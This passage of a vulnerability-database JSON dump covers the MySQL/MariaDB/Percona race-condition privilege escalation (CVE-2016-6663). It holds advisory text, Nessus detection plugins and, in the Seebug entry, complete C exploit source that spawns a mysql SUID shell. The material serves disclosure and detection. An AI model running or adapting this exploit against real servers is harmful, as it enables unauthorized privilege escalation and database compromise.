Check out the mysql SUID shell: \r\n\r\n-rwsrwxrwx 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD\r\n\r\n[+] Spawning the mysql SUID shell now... \r\n Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :)\r\n\r\nmysql_suid_shell.MYD-4.3$ whoami\r\nmysql\r\nmysql_suid_shell.MYD-4.3$ id\r\nuid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker)\r\nmysql_suid_shell.MYD-4.3$ ls -l /var/lib/mysql/mysql/user.*\r\n-rw-rw---- 1 mysql mysql 2879 Oct 29 14:23 /var/lib/mysql/mysql/user.frm\r\n-rw-rw---- 1 mysql mysql 168 Oct 29 22:35 /var/lib/mysql/mysql/user.MYD\r\n-rw-rw---- 1 mysql mysql 4096 Oct 30 00:11 /var/lib/mysql/mysql/user.MYI\r\nmysql_suid_shell.MYD-4.3$ exit\r\nexit\r\n\r\n[+] Job done. Exiting\r\n\r\n\r\nreal\t0m28.999s\r\nuser\t0m0.016s\r\nsys\t0m0.016s\r\n\r\n```\r\n\r\n\r\nVideo PoC:\r\n~~~~~~~~~~~~\r\nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n\r\n\r\n\r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n\r\nMalicious local users with DB access granted a common set of privileges \r\n(SELECT/INSERT/CREATE) could exploit this vulnerability to execute arbitrary \r\ncode and escalate their privileges to mysql system user. This would allow them \r\nto gain access to all of the databases stored on the server as well as exploit \r\nCVE-2016-6662 or CVE-2016-6664 vulnerabilities to further elevate privileges\r\nto root system user (rootshell) and fully compromise the target server.\r\n\r\nThis vulnerability could for example be exploited by malicious users in a shared \r\nhosting environment where each user is supposed to have access to only one \r\ndatabase assigned to them. \r\nIt could also be exploited by attackers who have managed to find a vulnerability\r\nin a website and gained access to the target system as a low-privileged user\r\n(such as apache/www-data).\r\n\r\n \r\nVII. 
SYSTEMS AFFECTED\r\n-------------------------\r\n\r\nMariaDB \r\n\t< 5.5.52\r\n\t< 10.1.18\r\n < 10.0.28\r\n\r\nMySQL \r\n\t<= 5.5.51\r\n\t<= 5.6.32\r\n\t<= 5.7.14\r\n\r\nPercona Server\r\n\t< 5.5.51-38.2\r\n\t< 5.6.32-78-1\r\n\t< 5.7.14-8\r\n\r\nPercona XtraDB Cluster\r\n\t< 5.6.32-25.17\r\n\t< 5.7.14-26.17\r\n\t< 5.5.41-37.0\r\n\r\n\r\n\r\nWhen checking whether your system contains the patches, note that this vulnerability \r\nhas been known under two CVE IDs: \r\n\r\nCVE-2016-6663\r\nCVE-2016-5616\r\n\r\nCVE-2016-6663 is the original CVE that all the affected vendors agreed to use. \r\nThe issue was, however, mistakenly listed in the Oracle CPU under a new CVE,\r\nCVE-2016-5616, resulting in a duplicate. Oracle has advised that the CPU will be \r\nupdated to state that CVE-2016-5616 is equivalent to CVE-2016-6663.\r\n\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n\r\nThe MariaDB/MySQL/PerconaDB vendors received a copy of this advisory in\r\nadvance, which allowed them to produce patches for this vulnerability before\r\ndisclosure.\r\n\r\nUpdate to the security releases issued by the vendor.\r\n\r\nAs a temporary mitigation, you can disable symbolic link support in the\r\ndatabase server configuration with the following my.cnf config setting:\r\n\r\nsymbolic-links = 0\r\n\r\nThis prevents tables from being placed outside the data directory via the DATA\r\nDIRECTORY option, which the race described above relies on.\r\n\r\nNevertheless, an update to a patched release is recommended.\r\n\r\n \r\nIX. 
REFERENCES\r\n-------------------------\r\n\r\nhttp://legalhackers.com\r\n\r\nThis advisory (CVE-2016-6663 / OCVE-2016-5616):\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html\r\n\r\nExploit (mysql-privesc-race.c) source code URL:\r\nhttp://legalhackers.com/exploits/mysql-privesc-race.c\r\n\r\nVideo PoC:\r\nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n\r\nAdvisory for CVE-2016-6664 / OCVE-2016-5617:\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\r\n\r\n\r\nVendor updates:\r\n\r\nhttp://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL\r\nhttp://www.mysql.com/\r\n\r\nhttps://mariadb.org/about/\r\nhttps://mariadb.com/kb/en/mdb-5552-rn/\r\nhttps://mariadb.com/kb/en/mdb-10118-rn/\r\nhttps://mariadb.com/kb/en/mdb-10028-rn/\r\n\r\nhttps://www.percona.com/software\r\n\r\n\r\nX. CREDITS\r\n-------------------------\r\n\r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\n\r\nhttp://legalhackers.com\r\n \r\n\r\nXI. REVISION HISTORY\r\n-------------------------\r\n\r\n01.11.2016 - Advisory released\r\n\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. 
I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.", "published": "2016-11-02T00:00:00", "type": "seebug", "title": "MySQL / MariaDB / PerconaDB \u63d0\u6743/\u6761\u4ef6\u7ade\u4e89\u6f0f\u6d1e\uff08CVE-2016-6663\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5616", "CVE-2016-5617", "CVE-2016-6662", "CVE-2016-6663", "CVE-2016-6664"], "modified": "2016-11-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92510", "id": "SSV:92510", "sourceData": "\n \r\n/*\r\n\r\nMySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\r\nmysql-privesc-race.c (ver. 1.0)\r\n\r\nCVE-2016-6663 / OCVE-2016-5616\r\n\r\nDiscovered/Coded by:\r\n\r\nDawid Golunski\r\n\r\ndawid[at]legalhackers.com\r\n@dawid_golunski\r\nhttp://legalhackers.com\r\n\r\n\r\nCompile:\r\ngcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient\r\n\r\nNote:\r\n* On RedHat-based systems you might need to change /tmp to another public directory\r\n\r\n* For testing purposes only. Do no harm. 
\r\n\r\nFull advisory URL:\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html\r\n\r\n*/\r\n\r\n\r\n#include <fcntl.h>\r\n#include <grp.h>\r\n#include <mysql.h>\r\n#include <pwd.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/inotify.h>\r\n#include <sys/stat.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <time.h>\r\n#include <unistd.h>\r\n\r\n\r\n#define EXP_PATH \"/tmp/mysql_privesc_exploit\"\r\n#define EXP_DIRN \"mysql_privesc_exploit\"\r\n#define MYSQL_TAB_FILE EXP_PATH \"/exploit_table.MYD\"\r\n#define MYSQL_TEMP_FILE EXP_PATH \"/exploit_table.TMD\"\r\n\r\n#define SUID_SHELL \t EXP_PATH \"/mysql_suid_shell.MYD\"\r\n\r\n#define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary\r\n\r\nMYSQL *conn;\t\t // DB handles\r\nMYSQL_RES *res;\r\nMYSQL_ROW row;\r\n\r\nunsigned long cnt;\r\n\r\n\r\nvoid intro() {\r\n\r\nprintf( \r\n \"\\033[94m\\n\"\r\n \"MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\\n\"\r\n \"mysql-privesc-race.c (ver. 1.0)\\n\\n\"\r\n \"CVE-2016-6663 / OCVE-2016-5616\\n\\n\"\r\n \"For testing purposes only. 
Do no harm.\\n\\n\"\r\n\t\"Discovered/Coded by:\\n\\n\"\r\n\t\"Dawid Golunski \\n\"\r\n\t\"http://legalhackers.com\"\r\n \"\\033[0m\\n\\n\");\r\n\r\n}\r\n\r\nvoid usage(char *argv0) {\r\n intro();\r\n printf(\"Usage:\\n\\n%s user pass db_host database\\n\\n\", argv0);\r\n}\r\n\r\nvoid mysql_cmd(char *sql_cmd, int silent) {\r\n \r\n if (!silent) {\r\n\t printf(\"%s \\n\", sql_cmd);\r\n }\r\n if (mysql_query(conn, sql_cmd)) {\r\n fprintf(stderr, \"%s\\n\", mysql_error(conn));\r\n exit(1);\r\n }\r\n res = mysql_store_result(conn);\r\n if (res>0) mysql_free_result(res);\r\n\r\n}\r\n\r\n\r\nint main(int argc,char **argv)\r\n{\r\n\r\n int randomnum = 0;\r\n int io_notified = 0;\r\n int myd_handle;\r\n int wpid;\r\n int is_shell_suid=0;\r\n pid_t pid;\r\n int status;\r\n struct stat st;\r\n /* io notify */\r\n int fd;\r\n int ret;\r\n char buf[4096] __attribute__((aligned(8)));\r\n int num_read;\r\n struct inotify_event *event;\r\n /* credentials */\r\n char *user = argv[1];\r\n char *password = argv[2];\r\n char *db_host = argv[3];\r\n char *database = argv[4];\r\n\r\n\r\n // Disable buffering of stdout\r\n setvbuf(stdout, NULL, _IONBF, 0);\r\n\r\n // Get the params\r\n if (argc!=5) {\r\n\tusage(argv[0]);\r\n\texit(1);\r\n } \r\n intro();\r\n // Show initial privileges\r\n printf(\"\\n[+] Starting the exploit as: \\n\");\r\n system(\"id\");\r\n\r\n // Connect to the database server with provided credentials\r\n printf(\"\\n[+] Connecting to the database `%s` as %s@%s\\n\", database, user, db_host);\r\n conn = mysql_init(NULL);\r\n if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) {\r\n fprintf(stderr, \"%s\\n\", mysql_error(conn));\r\n exit(1);\r\n }\r\n\r\n // Prepare tmp dir\r\n printf(\"\\n[+] Creating exploit temp directory %s\\n\", \"/tmp/\" EXP_DIRN);\r\n umask(000);\r\n system(\"rm -rf /tmp/\" EXP_DIRN \" && mkdir /tmp/\" EXP_DIRN);\r\n system(\"chmod g+s /tmp/\" EXP_DIRN );\r\n\r\n // Prepare exploit tables :)\r\n printf(\"\\n[+] 
Creating mysql tables \\n\\n\");\r\n mysql_cmd(\"DROP TABLE IF EXISTS exploit_table\", 0);\r\n mysql_cmd(\"DROP TABLE IF EXISTS mysql_suid_shell\", 0);\r\n mysql_cmd(\"CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 0);\r\n mysql_cmd(\"CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 0);\r\n\r\n // Copy /bin/bash into the mysql_suid_shell.MYD mysql table file\r\n // The file should be owned by mysql:attacker thanks to the sticky bit on the table directory\r\n printf(\"\\n[+] Copying bash into the mysql_suid_shell table.\\n After the exploitation the following file/table will be assigned SUID and executable bits : \\n\");\r\n system(\"cp /bin/bash \" SUID_SHELL);\r\n system(\"ls -l \" SUID_SHELL);\r\n\r\n // Use inotify to get the timing right\r\n fd = inotify_init();\r\n if (fd < 0) {\r\n printf(\"failed to inotify_init\\n\");\r\n return -1;\r\n }\r\n ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE);\r\n\r\n\r\n /* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */\r\n\r\n printf(\"\\n[+] Entering the race loop... 
Hang in there...\\n\");\r\n\r\n while ( is_shell_suid != 1 ) {\r\n\r\n cnt++;\r\n\tif ( (cnt % 100) == 0 ) {\r\n\t \tprintf(\"->\");\r\n\t \t//fflush(stdout);\t\r\n\t}\r\n\r\n /* Create empty file , remove if already exists */\r\n unlink(MYSQL_TEMP_FILE);\r\n unlink(MYSQL_TAB_FILE);\r\n \tmysql_cmd(\"DROP TABLE IF EXISTS exploit_table\", 1);\r\n\tmysql_cmd(\"CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 1);\r\n\r\n\t/* random num if needed */\r\n srand ( time(NULL) );\r\n randomnum = ( rand() % MAX_DELAY );\r\n\r\n // Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink\r\n pid = fork();\r\n if (pid < 0) {\r\n fprintf(stderr, \"Fork failed :(\\n\");\r\n }\r\n\r\n /* Child process - executes REPAIR TABLE SQL statement */\r\n if (pid == 0) {\r\n usleep(500);\r\n unlink(MYSQL_TEMP_FILE);\r\n\t mysql_cmd(\"REPAIR TABLE exploit_table EXTENDED\", 1);\r\n // child stops here\r\n exit(0);\r\n }\r\n\r\n /* Parent process - aims to replace the temp .tmd table with a symlink before chmod */\r\n if (pid > 0 ) {\r\n io_notified = 0;\r\n\r\n while (1) {\r\n int processed = 0;\r\n ret = read(fd, buf, sizeof(buf));\r\n if (ret < 0) {\r\n break;\r\n }\r\n while (processed < ret) {\r\n event = (struct inotify_event *)(buf + processed);\r\n if (event->mask & IN_CLOSE) {\r\n if (!strcmp(event->name, \"exploit_table.TMD\")) {\r\n //usleep(randomnum);\r\n\r\n\t\t\t // Set the .MYD permissions to suid+exec before they get copied to the .TMD file \r\n\t\t\t unlink(MYSQL_TAB_FILE);\r\n\t\t\t myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777);\r\n\t\t\t close(myd_handle);\r\n\t\t\t chmod(MYSQL_TAB_FILE, 04777);\r\n\r\n\t\t\t // Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec\r\n unlink(MYSQL_TEMP_FILE);\r\n symlink(SUID_SHELL, MYSQL_TEMP_FILE);\r\n io_notified=1;\r\n }\r\n }\r\n processed += sizeof(struct inotify_event);\r\n }\r\n if (io_notified) {\r\n break;\r\n 
}\r\n }\r\n\r\n\r\n waitpid(pid, &status, 0);\r\n }\r\n\r\n\t// Check if SUID bit was set at the end of this attempt\r\n if ( lstat(SUID_SHELL, &st) == 0 ) {\r\n\t if (st.st_mode & S_ISUID) {\r\n\t\tis_shell_suid = 1;\r\n\t }\r\n } \r\n\r\n }\r\n\r\n printf(\"\\n\\n[+] \\033[94mBingo! Race won (took %lu tries) !\\033[0m Check out the \\033[94mmysql SUID shell\\033[0m: \\n\\n\", cnt);\r\n system(\"ls -l \" SUID_SHELL);\r\n\r\n printf(\"\\n[+] Spawning the \\033[94mmysql SUID shell\\033[0m now... \\n Remember that from there you can gain \\033[1;31mroot\\033[0m with vuln \\033[1;31mCVE-2016-6662\\033[0m or \\033[1;31mCVE-2016-6664\\033[0m :)\\n\\n\");\r\n system(SUID_SHELL \" -p -i \");\r\n //system(SUID_SHELL \" -p -c '/bin/bash -i -p'\");\r\n\r\n /* close MySQL connection and exit */\r\n printf(\"\\n[+] Job done. Exiting\\n\\n\");\r\n mysql_close(conn);\r\n return 0;\r\n\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92510", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-02-01T04:03:51", "description": "The version of MariaDB running on the remote host is 10.0.x prior to\n10.0.29. It is, therefore, affected by multiple vulnerabilities :\n\n - A privilege escalation vulnerability exists in\n scripts/mysqld_safe.sh due to improper handling of\n arguments to malloc-lib. A local attacker can exploit\n this, via a symlink attack on error logs, to gain root\n privileges. (CVE-2016-6664)\n\n - A denial of service vulnerability exists in the\n check_duplicate_key() function due to improper handling\n of error messages. An authenticated, remote attacker can\n exploit this to crash the database.\n\n - A denial of service vulnerability exists in the\n destroy() function in sql/sql_select.cc due to improper\n handling of a specially crafted query. 
An authenticated,\n remote attacker can exploit this to crash the database.\n\n - A denial of service vulnerability exists in the\n date_add_interval() function in sql/sql_time.cc due to\n improper handling of INTERVAL arguments. An\n authenticated, remote attacker can exploit this to crash\n the database.\n\n - A denial of service vulnerability exists in\n sql/item_subselect.cc due to improper handling of\n queries from the select/unit tree. An authenticated,\n remote attacker can exploit this to crash the database.\n\n - A denial of service vulnerability exists in the\n check_well_formed_result() function in sql/item.cc due\n to improper handling of row validation. An\n authenticated, remote attacker can exploit this to crash\n the database.\n\n - A denial of service vulnerability exists in the\n safe_charset_converter() function in sql/item.cc due to\n improper handling of a specially crafted subselect query\n item. An authenticated, remote attacker can exploit this\n to crash the database.", "edition": 30, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-13T00:00:00", "title": "MariaDB 10.0.x < 10.0.29 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6664"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:mariadb:mariadb"], "id": "MARIADB_10_0_29.NASL", "href": "https://www.tenable.com/plugins/nessus/96486", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96486);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/04/10 16:10:16\");\n\n script_cve_id(\"CVE-2016-6664\");\n script_bugtraq_id(93612);\n\n script_name(english:\"MariaDB 10.0.x < 10.0.29 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the MariaDB version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The version of MariaDB running on the remote host is 10.0.x prior to\n10.0.29. It is, therefore, affected by multiple vulnerabilities :\n\n - A privilege escalation vulnerability exists in\n scripts/mysqld_safe.sh due to improper handling of\n arguments to malloc-lib. A local attacker can exploit\n this, via a symlink attack on error logs, to gain root\n privileges. (CVE-2016-6664)\n\n - A denial of service vulnerability exists in the\n check_duplicate_key() function due to improper handling\n of error messages. An authenticated, remote attacker can\n exploit this to crash the database.\n\n - A denial of service vulnerability exists in the\n destroy() function in sql/sql_select.cc due to improper\n handling of a specially crafted query. An authenticated,\n remote attacker can exploit this to crash the database.\n\n - A denial of service vulnerability exists in the\n date_add_interval() function in sql/sql_time.cc due to\n improper handling of INTERVAL arguments. An\n authenticated, remote attacker can exploit this to crash\n the database.\n\n - A denial of service vulnerability exists in\n sql/item_subselect.cc due to improper handling of\n queries from the select/unit tree. An authenticated,\n remote attacker can exploit this to crash the database.\n\n - A denial of service vulnerability exists in the\n check_well_formed_result() function in sql/item.cc due\n to improper handling of row validation. An\n authenticated, remote attacker can exploit this to crash\n the database.\n\n - A denial of service vulnerability exists in the\n safe_charset_converter() function in sql/item.cc due to\n improper handling of a specially crafted subselect query\n item. 
An authenticated, remote attacker can exploit this\n to crash the database.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/library/mariadb-10029-changelog/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/mariadb/mariadb-10029-release-notes/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MariaDB version 10.0.29 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mariadb:mariadb\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(variant:'MariaDB', fixed:'10.0.29-MariaDB', min:'10.0', severity:SECURITY_WARNING);\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T04:04:05", "description": "The version of MariaDB running on the remote host is 5.5.x prior to\n5.5.54. It is, therefore, affected by multiple vulnerabilities :\n\n - A privilege escalation vulnerability exists in\n scripts/mysqld_safe.sh due to improper handling of\n arguments to malloc-lib. A local attacker can exploit\n this, via a symlink attack on error logs, to gain root\n privileges. (CVE-2016-6664)\n\n - A denial of service vulnerability exists in\n sql/item_subselect.cc due to improper handling of\n queries from the select/unit tree. An authenticated,\n remote attacker can exploit this to crash the database.\n\n - A denial of service vulnerability exists in the\n check_well_formed_result() function in sql/item.cc due\n to improper handling of row validation. An\n authenticated, remote attacker can exploit this to crash\n the database.\n\n - A denial of service vulnerability exists in the\n parse_filter_rule() function in sql/rpl_filter.cc\n that is triggered during the clearing of wildcards. An\n authenticated, remote attacker can exploit this to crash\n the database.\n\n - A denial of service vulnerability exists in the\n safe_charset_converter() function in sql/item.cc due to\n improper handling of a specially crafted subselect query\n item. An authenticated, remote attacker can exploit this\n to crash the database.\n\n - A denial of service vulnerability exists in the\n st_select_lex::is_merged_child_of() function in\n sql/sql_lex.cc due to improper handling of merged views\n or derived tables. 
An authenticated, remote attacker can\n exploit this to crash the database.\n\n - A denial of service vulnerability exists in sql/item.cc\n due to improper handling of a specially crafted\n subquery. An authenticated, remote attacker can exploit\n this to crash the database.", "edition": 30, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-13T00:00:00", "title": "MariaDB 5.5.x < 5.5.54 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6664"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:mariadb:mariadb"], "id": "MARIADB_5_5_54.NASL", "href": "https://www.tenable.com/plugins/nessus/96489", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96489);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/04/10 16:10:16\");\n\n script_cve_id(\"CVE-2016-6664\");\n script_bugtraq_id(93612);\n\n script_name(english:\"MariaDB 5.5.x < 5.5.54 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the MariaDB version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MariaDB running on the remote host is 5.5.x prior to\n5.5.54. It is, therefore, affected by multiple vulnerabilities :\n\n - A privilege escalation vulnerability exists in\n scripts/mysqld_safe.sh due to improper handling of\n arguments to malloc-lib. A local attacker can exploit\n this, via a symlink attack on error logs, to gain root\n privileges. (CVE-2016-6664)\n\n - A denial of service vulnerability exists in\n sql/item_subselect.cc due to improper handling of\n queries from the select/unit tree. 
An authenticated,\n remote attacker can exploit this to crash the database.\n\n - A denial of service vulnerability exists in the\n check_well_formed_result() function in sql/item.cc due\n to improper handling of row validation. An\n authenticated, remote attacker can exploit this to crash\n the database.\n\n - A denial of service vulnerability exists in the\n parse_filter_rule() function in sql/rpl_filter.cc\n that is triggered during the clearing of wildcards. An\n authenticated, remote attacker can exploit this to crash\n the database.\n\n - A denial of service vulnerability exists in the\n safe_charset_converter() function in sql/item.cc due to\n improper handling of a specially crafted subselect query\n item. An authenticated, remote attacker can exploit this\n to crash the database.\n\n - A denial of service vulnerability exists in the\n st_select_lex::is_merged_child_of() function in\n sql/sql_lex.cc due to improper handling of merged views\n or derived tables. An authenticated, remote attacker can\n exploit this to crash the database.\n\n - A denial of service vulnerability exists in sql/item.cc\n due to improper handling of a specially crafted\n subquery. 
An authenticated, remote attacker can exploit\n this to crash the database.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/mariadb/mariadb-5554-release-notes/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/library/mariadb-5554-changelog/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MariaDB version 5.5.54 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mariadb:mariadb\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(variant:'MariaDB', fixed:'5.5.54-MariaDB', min:'5.5', severity:SECURITY_WARNING);\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T04:04:05", "description": "The version of MariaDB running on the remote host is 5.5.x prior to\n5.5.52. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified flaw exists in the Optimizer subcomponent\n that allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-3492)\n\n - An unspecified flaw exists in the MyISAM subcomponent\n that allows a local attacker to gain elevated\n privileges. (CVE-2016-5616)\n\n - An unspecified flaw exists in the DML subcomponent that\n allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-5624)\n\n - An unspecified flaw exists in the GIS subcomponent that\n allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-5626)\n\n - An unspecified flaw exists in the Federated subcomponent\n that allows an authenticated remote attacker to cause a\n denial of service condition. (CVE-2016-5629)\n\n - A security bypass vulnerability exists that allows an\n authenticated, remote attacker to bypass file access\n restrictions and create the /var/lib/mysql/my.cnf file\n with arbitrary contents without the FILE privilege\n requirement. (CVE-2016-6663)\n\n - An unspecified flaw exists in the Types subcomponent\n that allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-8283)\n\n - A flaw exists in the Item_field::fix_after_pullout()\n function within file sql/item.cc when handling a\n prepared statement with conversion to semi-join. 
An\n authenticated, remote attacker can exploit this to cause\n a denial of service condition.\n\n - An assertion flaw exists in the mysql_admin_table()\n function within file sql/sql_admin.cc when handling\n the re-execution of certain ANALYZE TABLE prepared\n statements. An authenticated, remote attacker can\n exploit this to cause a denial of service condition.", "edition": 30, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-08T00:00:00", "title": "MariaDB 5.5.x < 5.5.52 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5624", "CVE-2016-3492", "CVE-2016-6663", "CVE-2016-6664", "CVE-2016-5616", "CVE-2016-5626", "CVE-2016-8283", "CVE-2016-5629"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:mariadb:mariadb"], "id": "MARIADB_5_5_52.NASL", "href": "https://www.tenable.com/plugins/nessus/95633", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95633);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2016-3492\",\n \"CVE-2016-5616\",\n \"CVE-2016-5624\",\n \"CVE-2016-5626\",\n \"CVE-2016-5629\",\n \"CVE-2016-6663\",\n \"CVE-2016-8283\"\n );\n script_bugtraq_id(\n 92911,\n 93614,\n 93635,\n 93638,\n 93650,\n 93668,\n 93737\n );\n\n script_name(english:\"MariaDB 5.5.x < 5.5.52 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the MariaDB version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MariaDB running on the remote host is 5.5.x prior to\n5.5.52. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified flaw exists in the Optimizer subcomponent\n that allows an authenticated, remote attacker to cause a\n 